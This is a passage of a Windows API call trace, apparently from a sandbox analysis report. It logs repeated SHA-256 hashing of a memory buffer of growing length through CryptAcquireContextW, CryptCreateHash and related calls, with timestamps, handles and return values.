pdwDataLen=0xceadc) returned 1 [0119.304] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.304] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.304] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.305] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.305] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0119.305] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.305] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46a30 [0119.305] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e46a30, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e46a30, pdwDataLen=0xceadc) returned 1 [0119.305] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.305] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.305] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.305] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.306] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0119.306] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.306] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e469d0 [0119.306] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x2, pbData=0x32e469d0, pdwDataLen=0xceadc, dwFlags=0x0 | out: pbData=0x32e469d0, pdwDataLen=0xceadc) returned 1 [0119.306] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.306] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.306] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.306] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.306] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0119.306] CryptGetHashParam (in: hHash=0x7281e0, dwParam=0x4, pbData=0xceadc, pdwDataLen=0xceaec, dwFlags=0x0 | out: pbData=0xceadc, pdwDataLen=0xceaec) returned 1 [0119.306] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46c70 [0119.306] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.307] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.307] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.307] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.307] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0119.307] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46c40 [0119.307] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.307] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.307] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.308] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.308] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0119.308] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46640 [0119.308] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.308] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.308] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.308] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.308] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0119.308] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46b50 [0119.309] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.309] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.309] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41680 | out: hHeap=0x2150000) returned 1 [0119.309] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e41680 [0119.309] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.309] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.309] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x20, dwFlags=0x0) returned 1 [0119.309] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e466a0 [0119.309] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.309] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.309] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.310] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.310] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x40, dwFlags=0x0) returned 1 [0119.310] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46af0 [0119.310] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.310] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.310] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.311] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.311] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x60, dwFlags=0x0) returned 1 [0119.311] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46c10 [0119.311] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.311] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.311] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.311] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.311] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x80, dwFlags=0x0) returned 1 [0119.311] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46a90 [0119.311] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.311] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.311] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.312] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.312] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0119.312] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46a60 [0119.312] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.312] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.312] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.313] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.313] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0119.313] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e468b0 [0119.313] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.313] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.313] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.326] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.326] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0119.328] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46b20 [0119.328] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.328] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.328] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.328] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.328] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x100, dwFlags=0x0) returned 1 [0119.328] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46b80 [0119.328] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.328] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.328] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.329] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.329] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x120, dwFlags=0x0) returned 1 [0119.329] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46bb0 [0119.329] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.329] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.329] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.330] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.330] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x140, dwFlags=0x0) returned 1 [0119.330] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46be0 [0119.330] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.330] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.330] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.330] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.331] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x160, dwFlags=0x0) returned 1 [0119.331] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46970 [0119.331] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.331] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.331] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.331] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.331] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x180, dwFlags=0x0) returned 1 [0119.331] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46550 [0119.331] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.331] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.331] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.333] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.333] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0119.333] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46ca0 [0119.333] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.333] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.333] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.333] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.333] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0119.334] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46580 [0119.334] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.334] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.334] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.334] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.334] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0119.334] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e465b0 [0119.334] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.334] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.334] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.335] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.335] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x200, dwFlags=0x0) returned 1 [0119.335] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46a00 [0119.335] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.335] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.335] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.335] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.335] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x220, dwFlags=0x0) returned 1 [0119.336] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e467c0 [0119.336] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.336] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.336] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.336] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.336] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x240, dwFlags=0x0) returned 1 [0119.336] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46820 [0119.336] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.336] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.336] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.337] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.337] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x260, dwFlags=0x0) returned 1 [0119.337] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46730 [0119.337] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.337] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.337] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.337] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.337] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x280, dwFlags=0x0) returned 1 [0119.338] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46940 [0119.338] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.338] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.338] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.338] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.338] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0119.338] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e465e0 [0119.338] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.338] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.338] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.339] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.339] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0119.339] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e469a0 [0119.339] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.339] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.339] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.340] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.340] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0119.340] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46670 [0119.340] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.340] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.340] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.340] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.340] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x300, dwFlags=0x0) returned 1 [0119.341] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e466d0 [0119.341] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.341] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.341] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.341] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.341] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x320, dwFlags=0x0) returned 1 [0119.341] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46760 [0119.341] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.341] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.342] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.342] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.342] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x340, dwFlags=0x0) returned 1 [0119.342] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e467f0 [0119.342] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.342] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.342] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.343] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.343] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x360, dwFlags=0x0) returned 1 [0119.343] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46850 [0119.343] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.343] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.343] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.343] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.344] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x380, dwFlags=0x0) returned 1 [0119.344] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e468e0 [0119.344] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.344] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.344] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.344] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.344] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0119.344] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47330 [0119.344] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.344] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.344] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.345] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.345] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0119.351] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46df0 [0119.351] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.351] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.351] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.351] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.351] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0119.351] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47000 [0119.352] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.352] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.352] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.352] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.352] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x400, dwFlags=0x0) returned 1 [0119.352] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47270 [0119.352] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.352] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.352] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.353] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.353] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, 